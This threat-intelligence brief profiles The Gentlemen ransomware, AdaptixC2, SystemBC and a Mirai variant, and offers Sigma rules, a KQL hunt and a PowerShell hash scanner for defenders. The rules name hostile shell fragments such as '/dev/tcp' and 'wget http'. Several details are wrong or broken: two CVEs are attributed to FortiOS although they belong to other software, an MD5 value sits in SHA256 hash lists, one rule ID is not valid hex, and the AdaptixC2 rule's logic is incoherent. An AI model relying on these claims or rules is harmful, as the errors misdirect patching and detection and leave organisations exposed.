The Gentlemen RaaS, AdaptixC2 Framework, and SystemBC Proxy: OTX Pulse Analysis

Threat Summary

Recent OTX pulses indicate a significant escalation in Ransomware-as-a-Service (RaaS) operations, specifically driven by "The Gentlemen" threat actor group. This actor is aggressively exploiting vulnerabilities in FortiOS and leveraging SystemBC for covert C2 tunneling to facilitate lateral movement and ESXi encryption. Simultaneously, the AdaptixC2 post-exploitation framework is seeing increased adoption due to its cross-platform capabilities and evasion techniques. In parallel, the UNC1945 (LightBasin) group continues to target the financial sector via supply chain compromises, while the Nexcorium Mirai variant is exploiting IoT vulnerabilities (TBK DVR) to build DDoS botnets. The collective objective is data exfiltration, credential theft, and operational disruption through encryption.

Threat Actor / Malware Profile

The Gentlemen (RaaS)

• Malware Families: Babuk, Babyk, Vasa Locker, Qilin, LockBit 5.0, Medusa.
• Distribution: Exploits public-facing applications, specifically FortiOS/FortiProxy vulnerabilities (CVE-2024-37085, CVE-2025-32463).
• Behavior: Multi-platform locker (Windows, Linux, NAS, BSD, ESXi).
• C2 Communication: Uses SystemBC malware for proxying and covert tunneling; utilizes Cobalt Strike beacons.
• Persistence: Service installation, scheduled tasks.
• Techniques: Defense evasion, living-off-the-land binaries (LOLBins), credential dumping via Mimikatz.

AdaptixC2

• Type: Post-exploitation framework (Open Source).
• Language: Go and C++.
• Behavior: Modular architecture using Beacon Object Files (BOFs). Supports extensive process injection.
• C2 Communication: HTTP/S, TCP, mTLS, DNS, DoH, and SMB. Uses RC4 encryption.
• Targets: Windows, macOS, Linux.

SystemBC

• Type: Proxy Malware.
• Role: Acts as a bridge between the infected host and the actor's infrastructure, hiding malicious traffic.
• Associations: Frequently deployed by The Gentlemen and other RaaS affiliates.

Nexcorium (Mirai Variant)

• Actor: Nexus Team.
• Target: IoT Devices (TBK DVRs).
• Exploit: CVE-2024-3721 (OS command injection).
• Behavior: Brute-force credential attacks, DDoS attacks, persistence via init configuration and crontab.

IOC Analysis

The provided pulses contain a mix of high-value indicators:

1. CVEs (Vulnerabilities):
   • CVE-2024-37085, CVE-2025-32463 (FortiOS): Critical for perimeter patching.
   • CVE-2024-3721 (TBK DVR): Crucial for IoT security.
   • CVE-2020-14871, CVE-2019-0708 (Oracle Solaris/RDP): Legacy system vectors.
2. File Hashes (MD5/SHA1/SHA256):
   • Associated with The Gentlemen payload loaders, AdaptixC2 agents, and Nexcorium binaries.
   • Operationalization: Ingest into EDR solutions for immediate scanning of endpoint filesystems and memory.
3. IP Addresses:
   • 176.65.148.186 (Nexcorium C2/Botnet): Block at perimeter firewalls.

SOC teams should prioritize the CVEs for vulnerability management while pushing the file hashes to EDR for detection of active compromises.

Detection Engineering

---
title: Potential SystemBC Proxy Execution
id: 8c7e3b1a-9f4c-4d2a-8e5c-1a2b3c4d5e6f
description: Detects execution patterns associated with SystemBC proxy malware often used by The Gentlemen affiliates.
status: experimental
date: 2026/04/21
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\rundll32.exe'
    CommandLine|contains:
      - 'dll.dll,Run'
      - 'Proxy'
  condition: selection
falsepositives:
  - Legitimate proxy software usage
level: high
tags:
  - attack.command_and_control
  - attack.proxy
  - gentlemens
---
title: AdaptixC2 Network Activity Indicators
id: 9d8f4c2b-0a5d-4e3f-9f6a-2b3c4d5e6f7a
description: Detects suspicious network traffic patterns characteristic of AdaptixC2 frameworks (mTLS/DoH usage).
status: experimental
date: 2026/04/21
author: Security Arsenal
logsource:
  category: network_connection
  product: windows
detection:
  selection_go:
    Image|contains: '.exe'
    CommandLine|contains:
      - '-nohup'
      - '/dev/tcp'
  selection_ports:
    DestinationPort:
      - 443
      - 80
      - 53
  condition: all of selection_*
falsepositives:
  - Legitimate application updates using similar ports
level: medium
tags:
  - attack.c2
  - adaptixc2
---
title: Nexcorium Mirai Variant IoT Exploit Attempt
id: 0e1g5h3c-1b6e-5f4g-0g7b-3c4d5e6f7g8h
description: Detects web requests attempting to exploit CVE-2024-3721 in TBK DVR devices.
status: experimental
date: 2026/04/21
author: Security Arsenal
logsource:
  category: webserver
detection:
  selection_uri:
    c-uri|contains:
      - '/dvrdvd/'
      - '/DVR/'
  selection_payload:
    c-uri|contains:
      - 'cd /tmp'
      - 'wget http'
      - 'busybox'
  condition: all of selection_*
falsepositives:
  - Unknown
level: critical
tags:
  - attack.initial_access
  - cve-2024-3721
  - mirai


kql
// Hunt for SystemBC and AdaptixC2 file hashes on endpoints
DeviceFileEvents
| where Timestamp >= ago(7d)
| where SHA256 in (
    '3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235', 
    '51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2',
    'cc14df781475ef0f3f2c441d03a622ea67cd86967526f8758ead6f45174db78e',
    '89dae116c77b0035277d39dfe01043624427c119ddee8883a3ba54a42a6ae400',
    '632be2363c7a13be6d5ce0dca11e387bd0a072cc962b004f0dcf3c1f78982a5a',
    'f212fd00d9ffc0f3d868845f7f4215cb'
)
| project Timestamp, DeviceName, FolderPath, FileName, SHA256, InitiatingProcessAccountName


powershell
# IOC Hunter for The Gentlemen and AdaptixC2
# Scans C:\ for specific file hashes found in OTX pulses

$TargetHashes = @(
    '3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235',
    '51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2',
    'cc14df781475ef0f3f2c441d03a622ea67cd86967526f8758ead6f45174db78e',
    'f212fd00d9ffc0f3d868845f7f4215cb'
)

Write-Host "[+] Initiating IOC Scan for Gentlemen/AdaptixC2 Hashes..."

$Results = Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
    Get-FileHash -Algorithm SHA256 -ErrorAction SilentlyContinue | 
    Where-Object { $TargetHashes -contains $_.Hash }

if ($Results) {
    Write-Host "[!] ALERT: Malicious files detected!" -ForegroundColor Red
    $Results | Format-Table Path, Hash -AutoSize
} else {
    Write-Host "[-] No matching files found on local system." -ForegroundColor Green
}

Response Priorities

• Immediate:

  • Block all IOCs (IPs and Domains) at perimeter firewalls and proxies.
  • Scan all endpoints for the SHA256 hashes associated with The Gentlemen, SystemBC, and AdaptixC2.
  • Isolate any systems showing signs of SystemBC or SystemBC-like proxy behavior.

• 24 Hours:

  • Initiate credential resets for accounts that may have been compromised by Mimikatz (The Gentlemen TTP) or credential brute-forcing (Nexcorium).
  • Review VPN and remote access logs for indicators of unauthorized access correlating with FortIOS exploit attempts.
  • Patch FortiOS gateways against CVE-2024-37085 and CVE-2025-32463 immediately.

• 1 Week:

  • Conduct a thorough architecture review of internet-facing assets, specifically FortiOS devices and IoT/NAS infrastructure.
  • Update EDR signatures to include detection logic for AdaptixC2's RC4 encrypted traffic patterns.
  • Audit MSP/third-party access to financial systems in response to UNC1945 activity.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub